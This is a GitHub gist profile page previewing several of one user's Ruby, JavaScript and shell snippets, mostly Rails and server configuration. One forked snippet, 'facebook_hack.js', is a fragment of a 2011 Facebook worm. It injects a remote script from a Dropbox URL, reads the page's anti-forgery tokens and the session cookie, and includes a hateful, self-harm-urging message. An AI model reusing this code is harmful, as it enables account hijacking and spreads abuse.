Skip to content

Instantly share code, notes, and snippets.

View filipeamoreira's full-sized avatar

Filipe A Moreira filipeamoreira

View GitHub Profile
@filipeamoreira
filipeamoreira / config.ru
Created March 7, 2012 22:39
Rails Lightweight Stack. Most of this is detailed on Crafting Rails Applications - http://pragprog.com/book/jvrails/crafting-rails-applications
# Run this file with `RAILS_ENV=production rackup -p 3000 -s thin`
# Be sure to have rails and thin installed.
require "rubygems"
# We are not loading Active Record, nor the Assets Pipeline, etc.
# This could also be in your Gemfile.
gem "actionpack", "~> 3.2"
gem "railties", "~> 3.2"
# The following lines should come as no surprise. Except by
class PostsController < ActionController::Base
def create
Post.create(post_params)
end
def update
Post.find(params[:id]).update_attributes!(post_params)
end
private
# Author: Pieter Noordhuis
# Description: Simple demo to showcase Redis PubSub with EventMachine
#
# Update 7 Oct 2010:
# - This example does *not* appear to work with Chrome >=6.0. Apparently,
# the WebSocket protocol implementation in the cramp gem does not work
# well with Chrome's (newer) WebSocket implementation.
#
# Requirements:
# - rubygems: eventmachine, thin, cramp, sinatra, yajl-ruby
// loop through the 'paper' variable from Raphael JS and build up the JSON object describing all images and paths within it.
loadJSON = function(paper, json) {
var set = paper.set();
$.each(json, function(index, node) {
try {
var el = paper[node.type]().attr(node);
set.push(el);
} catch(e) {}
});
return set;
@filipeamoreira
filipeamoreira / gist:1062968
Created July 4, 2011 06:17 — forked from mhawksey/gist:1029258
Google Apps Script to display email notification
function doGet(e) {
try{
var app = UiApp.createApplication();
var mainPanel = app.createVerticalPanel();
var emailTable = app.createFlexTable().setId("emailTable");
app.add(mainPanel);
mainPanel.add(emailTable);
var mail = GmailApp.getInboxThreads(0, 10);
for (var i = mail.length; i > 0; i--) {
var msg = mail[i-1];
@filipeamoreira
filipeamoreira / facebook_hack.js
Created May 12, 2011 08:50 — forked from tysonmote/facebook_hack.js
Nicole Santos Facebook hack
// 5/11/11 Facebook hack -- Started spreading and was quickly taken down by Dropbox (where the file was hosted).
var message = "Fuck you faggot. Go kill yourself. Do whatever the fuck you want. I hate you and the only way to remove all these posts is by disabling this below.";
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
var myText = "Remove This App";
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
guto@server:~/scm/git/intranet-stage$ rails c
/usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/bundler/gems/tiny_tds-ef384b4cddba/lib/tiny_tds/client.rb:57:in `connect': TinyTds::Error: Unable to open socket (Sequel::DatabaseConnectionError)
from /usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/bundler/gems/tiny_tds-ef384b4cddba/lib/tiny_tds/client.rb:57:in `initialize'
from /usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/gems/sequel-3.21.0/lib/sequel/adapters/tinytds.rb:16:in `new'
from /usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/gems/sequel-3.21.0/lib/sequel/adapters/tinytds.rb:16:in `connect'
from /usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/gems/sequel-3.21.0/lib/sequel/database/misc.rb:45:in `block in initialize'
from /usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/gems/sequel-3.21.0/lib/sequel/connection_pool.rb:92:in `call'
from /usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/gems/sequel-
*** LOCAL GEMS ***
abstract (1.0.0)
actionmailer (3.0.3)
actionpack (3.0.3)
activemodel (3.0.3)
activerecord (3.0.3)
activerecord-jdbc-adapter (1.1.1)
activerecord-jdbcsqlite3-adapter (1.1.1)
activeresource (3.0.3)
@filipeamoreira
filipeamoreira / gist:862035
Created March 9, 2011 11:08
Trinidad config file
port: 3000
ajp:
port: 8009
@filipeamoreira
filipeamoreira / gist:862026
Created March 9, 2011 10:58
Trinidad /etc/init.d/trinidad
#! /bin/sh
# Generic script for running ruby scripts as daemons using
# jsvc and a java class to control the daemon.
#
# Contains common parameters and start/stop
# Things you'll need to set on a per script/daemon basis:
# SCRIPT_NAME - Path to the ruby script which creates a Daemon
# object for jsvc to control
# APP_NAME - Name of your application